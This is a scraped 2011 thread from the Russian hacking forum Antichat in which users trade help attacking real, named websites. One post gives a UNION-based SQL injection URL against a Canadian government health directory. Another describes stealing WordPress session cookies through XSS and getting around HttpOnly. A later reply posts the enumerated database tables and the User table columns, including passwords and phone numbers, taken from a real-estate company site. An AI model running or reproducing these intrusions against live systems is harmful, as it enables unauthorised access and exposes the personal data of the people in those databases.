ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
07.06.2011, 19:00
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Читал, пробовал разные варианты
Код:
http://www.hlthss.gov.nt.ca/english/services/help_lines/help_directory_database/view_organization_detailed.asp?ID=148+and+1=-1+UniOn+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+MSysObjects
Не получается вывести диагностические ошибки о правильности или неправильности |
|
|
08.06.2011, 02:37
|
|
Новичок
Регистрация: 29.04.2010
Сообщений: 19
Провел на форуме:
58603
Репутация:
3
|
|
Всем привет!
Подскажите, по какой причине может передаваться не вся кука?
Всякий хлам из нее доходит, а вот ключа с сессией пользователя нет.
add:
На сайте wordpress 3.1.3... xss в форуме(плагин для wp).
Еще попробовал в адрессной строке просмотреть алертом... тоже самое... без нужного значения. Опера показывает все, и еще на нужной записи стоит флаг HttpOnly, на остальных нет.
|
|
|
|
08.06.2011, 02:56
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512
Репутация:
0
|
|
IMMORTAL_S, сам ответил на вопрос. HttpOnly
|
|
|
|
08.06.2011, 03:06
|
|
Новичок
Регистрация: 29.04.2010
Сообщений: 19
Провел на форуме:
58603
Репутация:
3
|
|
Да, уже погуглил.
Что-то еще можно сделать?.. как-то убрать этот флаг?
add:
нашел ява апплет... всем спасибо))
|
|
|
|
08.06.2011, 03:49
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512
Репутация:
0
|
|
cookiejacking - новый вид атаки, использующей зиродей в IE всех версий. В конце мая на HITB2011 был продемонстрирован.
|
|
|
|
08.06.2011, 05:27
|
|
Новичок
Регистрация: 29.04.2010
Сообщений: 19
Провел на форуме:
58603
Репутация:
3
|
|
Сообщение от M_script
cookiejacking - новый вид атаки, использующей зиродей в IE всех версий. В конце мая на HITB2011 был продемонстрирован.
спасибо, лови +
пока забил на куки... нашел sqlinj
|
|
|
|
08.06.2011, 11:37
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0
Репутация:
0
|
|
В какую сторону раскручивать?
Код:
http://www.homesrochester.com/index.cfm?PageID=1
пробовал как mssql, не выходит |
|
|
|
08.06.2011, 11:48
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Сообщение от mix0x0
В какую сторону раскручивать?
Код:
http://www.homesrochester.com/index.cfm?PageID=1
пробовал как mssql, не выходит Крутить нужно как проведение SQL инъекций в Microsoft Access:
/thread50550.html
но навряд ли ты ее раскрутишь
|
|
|
|
08.06.2011, 12:20
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404
Репутация:
564
|
|
2mix0x0 там все просто, стоит Microsoft SQL Server 2005 почитай тут тут и тут
там 100500 БД...
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
|
|
|
|
08.06.2011, 12:57
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Сообщение от shell_c0de
2mix0x0 там все просто, стоит Microsoft SQL Server 2005 почитай тут
тут
и
тут
там 100500 БД... Вы правы, там все легко выводится:
DB Name: hr
Table found: sysdiagrams
Table found: Process
Table found: MLSArea
Table found: ProcessStep
Table found: FileImport
Table found: User
Table found: Theme
Table found: MLSListingImage
Table found: Agent
Table found: MLSListing
Table found: Office
Table found: Table1
Table found: Table2
Table found: ContainerModule
Table found: ListingPriceHistory
Table found: PageContainer
Table found: Portlet
Table found: OpenHouse
Table found: PortletProperty
Table found: ModuleProperty
Table found: PropertyType
Table found: Page
Table found: FeaturedListing
Table found: UserSearch
Table found: FileImportColumn
Table found: ListingType
Table found: Document
Table found: MLSListingLink
Table found: WebLog
Table found: Container
Table found: OpenHouseTemp
Table found: Module
Table found: State
Table found: Website
hr.User
Column found: AddedByID
Column found: AddedDt
Column found: EmailAddress
Column found: FirstName
Column found: HomePhone
Column found: LastName
Column found: MobilePhone
Column found: Password
Column found: SysAdminFl
Column found: UpdatedByID
Column found: UpdatedDt
Column found: UserID
Column found: UserName
Column found: UserStatus
Column found: WorkPhone
От меня ++++++++ и большое thanks за науку.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
